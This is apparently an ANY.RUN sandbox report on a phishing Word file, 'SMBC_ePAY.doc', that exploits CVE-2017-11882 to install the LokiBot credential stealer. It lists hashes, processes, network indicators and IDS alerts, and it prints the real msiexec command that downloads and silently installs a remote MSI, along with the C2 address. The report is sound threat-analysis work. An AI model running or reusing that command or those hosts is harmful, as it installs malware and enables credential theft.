analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SMBC_ePAY.doc

Full analysis: https://app.any.run/tasks/79588907-1c66-4e80-b0c1-2aa0b172ecb4
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 14, 2018, 05:38:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
exe-to-msi
loader
lokibot
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

61A0E4C23B9A496864006115476FFFE0

SHA1:

0005449BE07684EB7FB59441C4549B8218E15E3A

SHA256:

AFFD587247B5638BA3A061C9382338DFE508CBA034AD690AAAC55C2ECEFC8BC6

SSDEEP:

768:QmKfcZpEHUqUisx+NLBZVSxkBIREAawjfAzHeCs1h4x4OoQa0kf6qhF/gJ1bw:Q4ZcUisxYtICSht7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3644)
      • EQNEDT32.EXE (PID: 4056)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3904)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3904)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2292)
      • cmd.exe (PID: 2864)
    • Detected artifacts of LokiBot

      • MSI3DA3.tmp (PID: 2244)
    • LOKIBOT was detected

      • MSI3DA3.tmp (PID: 2244)
    • Connects to CnC server

      • MSI3DA3.tmp (PID: 2244)
    • Actions looks like stealing of personal data

      • MSI3DA3.tmp (PID: 2244)
    • Loads dropped or rewritten executable

      • Setup.exe (PID: 2228)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3644)
      • EQNEDT32.EXE (PID: 4056)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3904)
      • MSI3DA3.tmp (PID: 2244)
      • Setup.exe (PID: 2228)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3904)
    • Loads DLL from Mozilla Firefox

      • MSI3DA3.tmp (PID: 2244)
    • Creates files in the user directory

      • MSI3DA3.tmp (PID: 2244)
    • Searches for installed software

      • Setup.exe (PID: 2228)
  • INFO

    • Application was dropped or rewritten from another process

      • MSI3DA3.tmp (PID: 2244)
      • MSI3DA3.tmp (PID: 860)
      • MSIDB89.tmp (PID: 3404)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3904)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3644)
      • EQNEDT32.EXE (PID: 4056)
    • Application launched itself

      • MSI3DA3.tmp (PID: 860)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3904)
      • MSI3DA3.tmp (PID: 860)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3724)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3724)
      • Setup.exe (PID: 2228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
12
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe msi3da3.tmp no specs #LOKIBOT msi3da3.tmp eqnedt32.exe cmd.exe no specs msiexec.exe no specs msidb89.tmp no specs setup.exe

Process information

PID
CMD
Path
Indicators
Parent process
3724"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\SMBC_ePAY.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3644"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2292cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/mb.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3144msiexec.exe /i http://34.244.180.39/mb.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3904C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
860"C:\Windows\Installer\MSI3DA3.tmp"C:\Windows\Installer\MSI3DA3.tmpmsiexec.exe
User:
admin
Company:
interradiating
Integrity Level:
MEDIUM
Description:
ansation
Exit code:
0
Version:
2.04.0009
2244C:\Windows\Installer\MSI3DA3.tmp"C:\Windows\Installer\MSI3DA3.tmp
MSI3DA3.tmp
User:
admin
Company:
interradiating
Integrity Level:
MEDIUM
Description:
ansation
Version:
2.04.0009
4056"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2864cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/mb.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3664msiexec.exe /i http://34.244.180.39/mb.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Total events
6 802
Read events
6 025
Write events
0
Delete events
0

Modification events

No data
Executable files
7
Suspicious files
5
Text files
13
Unknown types
12

Dropped files

PID
Process
Filename
Type
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR30B0.tmp.cvr
MD5:
SHA256:
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFE807778EDA6D8E84.TMP
MD5:
SHA256:
3904msiexec.exeC:\Config.Msi\183bdd.rbs
MD5:
SHA256:
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFDD29ABD21DAB3BCE.TMP
MD5:
SHA256:
2244MSI3DA3.tmpC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
3724WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D60D20A20527B37836471105C937C8C9
SHA256:D732ED54E40AA23E1F5E768DA5969B8DA55C63266851B617B2E390CE2BF33573
3904msiexec.exeC:\Windows\Installer\MSI395A.tmpexecutable
MD5:47D82947DAC6E6D4C5E0F8E3891F5968
SHA256:7991EA268B97C213B3067B9E84E4422511543651735B36E6A067E58EFA2AD286
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:AC961F47B8FDAD0EE979D551B7A7DA9F
SHA256:E0087DCCD97A0F0BA58BBD1230B951563725F87844A3D3D9F2E5AD6CFAFE7820
3904msiexec.exeC:\Windows\Installer\MSI3DA3.tmpexecutable
MD5:A581DFB486E4C6A09FA3A188494BA132
SHA256:02E5363BD473DEC1EF672B534754B80A99F4C81C477D6F546296037D4F1E971F
3904msiexec.exeC:\Windows\Installer\183bdc.ipibinary
MD5:AEF9CFBDA764FF47563A0D4111FB3935
SHA256:7A0A159C433137568B1F09B40187ACE82CA65725FB94401E36E68CB135E69050
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
7
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3904
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/mb.msi
IE
executable
1.27 Mb
suspicious
3904
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/mb.msi
IE
executable
1.27 Mb
suspicious
2244
MSI3DA3.tmp
POST
404
87.236.22.87:80
http://sahakyanshn.com/baba1010/five/fre.php
RU
text
15 b
malicious
2244
MSI3DA3.tmp
POST
404
87.236.22.87:80
http://sahakyanshn.com/baba1010/five/fre.php
RU
text
15 b
malicious
2244
MSI3DA3.tmp
POST
404
188.225.10.43:80
http://sahakyanshn.com/baba1010/five/fre.php
RU
binary
23 b
suspicious
2244
MSI3DA3.tmp
POST
404
87.236.22.87:80
http://sahakyanshn.com/baba1010/five/fre.php
RU
binary
23 b
malicious
2244
MSI3DA3.tmp
POST
404
185.224.249.70:80
http://sahakyanshn.com/baba1010/five/fre.php
unknown
binary
23 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2244
MSI3DA3.tmp
188.225.10.43:80
sahakyanshn.com
TimeWeb Ltd.
RU
suspicious
2244
MSI3DA3.tmp
185.224.249.70:80
sahakyanshn.com
malicious
3904
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious
2244
MSI3DA3.tmp
87.236.22.87:80
sahakyanshn.com
Beget Ltd
RU
malicious

DNS requests

Domain
IP
Reputation
sahakyanshn.com
  • 87.236.22.87
  • 188.225.10.43
  • 185.224.249.70
unknown

Threats

PID
Process
Class
Message
3904
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3904
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
2244
MSI3DA3.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2244
MSI3DA3.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
2244
MSI3DA3.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
2244
MSI3DA3.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
2244
MSI3DA3.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
2244
MSI3DA3.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
7 ETPRO signatures available at the full report
No debug info